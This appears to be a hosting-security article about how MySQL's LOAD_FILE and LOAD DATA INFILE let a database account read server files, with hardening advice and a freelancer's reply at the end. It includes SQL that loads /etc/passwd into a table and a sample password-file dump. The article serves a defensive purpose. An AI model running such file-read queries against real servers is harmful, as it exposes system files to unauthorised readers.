Mysql,as we have known, is a very popular DBMS (Database Management System),includes 4 types:
* MySQL Standard includes the standard storage engine, as well as the InnoDB storage engine, which is touted as a “transaction-safe, ACID-compliant database” with some additional features over the standard version.
* MySQL Pro is the commercial version.
* MySQL Max includes the more technologically advanced features that are available during early access programs.
* MySQL Classic is the standard storage engine without the InnoDB engine. This is another commercial version.
For increasing usability, the Mysql developer team have added some functions which is vulnerable for server [login to view URL] probably have heard about Local attack method through [login to view URL] try an example:
(In this example,I suppose attacker had owned one mysql account which had rights to create,edit,and add/remove DB on server)
By creating a table like this :
use atttacker;
Create table readfile(text LONGTEXT);
Insert into readfile values(loadfile('/etc/passwd');
As you can see,the result is :
Select * from readfile;
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
ident:x:100:101::/home/ident:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
canna:x:39:39:Canna Service User:/var/lib/canna:/sbin/nologin
wnn:x:49:49:Wnn Input Server:/var/lib/wnn:/sbin/nologin
mysql:x:101:102:MySQL server:/var/lib/mysql:/bin/bash
named:x:25:25:Named:/var/named:/sbin/nologin
Some probably wonder : "Oops,Why could the attacker exploit my server although I had already hardened it carefully ,Safe_mod on ,open_basedir set,System funcions had been disable?".This could be your administrator had forgotten or had not care enough about this [login to view URL] problem here is web need to find out the risk from mysql's usability ,on the view of customers(in case you are managing a shared-host enviroment).
"Do they really need those functions?"
"How could an attacker do when they had an account in mysql"
You can find a solution and deploy it after answering two questions [login to view URL] have a look on mysql's functions.
Which one could be the most danger?
First,consider load_file() [login to view URL] one structure is LOAD_FILE(file_name) .This is used to read a file content and return as a [login to view URL] mysql manual pages,you can see its' requirements :
" To use this function, the file must be located on the server host, you must specify the full pathname to the file, and you must have the FILE privilege. The file must be readable by all and its size less than max_allowed_packet bytes. "
To read a file through mysql,user must has File Privilege,then this file must be readable by [login to view URL] are two golden keys for us,poor sysadmin,to prevent the [login to view URL] a normal customer,when they need to manipulate file,
there are 2 cases:
[login to view URL] php ,perl,or Cgi,asp,file manager in hosting control panel
[login to view URL] directly through FTP
So it is not necessary for a normal customer to own File [login to view URL] preventing this risk ,simply you can disable File privilege all users in mysql
The next one is "load data infile" function :
"LOAD DATA [LOW_PRIORITY | CONCURRENT] [LOCAL] INFILE 'file_name'
[REPLACE | IGNORE]
INTO TABLE tbl_name
[FIELDS
[TERMINATED BY 'string']
[[OPTIONALLY] ENCLOSED BY 'char']
[ESCAPED BY 'char']
]
[LINES
[STARTING BY 'string']
[TERMINATED BY 'string']
]
[IGNORE number LINES]
[(col_name,...)] "
(This mini-article considers you have already know about mysql [login to view URL] we don't metion about the use or its' structure).
This one is the same with load_file() but the speed is [login to view URL],this one has one more keyword is "local".
In case "local" had been added in [login to view URL] would read file in the client and sent it to [login to view URL] vast majaority servers set up mysql on localhost (themselves) so that it isn't important to has it or [login to view URL] its' requirement:
"For security reasons, when reading text files located on the server, the files must either reside in the database directory or be readable by all. Also, to use LOAD DATA INFILE on server files, you must have the FILE privilege "
Also,the File Privil is the most important key to prevent this rick.
About dumping file on server ,it's not really popular so it's not important to discuss about it here.
Conclusion:
Mysql is a really ,really powerful DBMS for its' Power,speed,and usabilities but for so many unneeded functions make it become potential risk to [login to view URL] you can earn a litle bit experience to improve sercurity for yourself
Hi. I am an experienced Linux/SQL system administrator. Will provide setup, tuning and further support. That's quite a nice article, but it doesn't explain what you want. If it is hardening your MySQL permissions, then it's ok to do that. Please provide the configuration details you need. Looking forward to hearing from you.
Regards, NK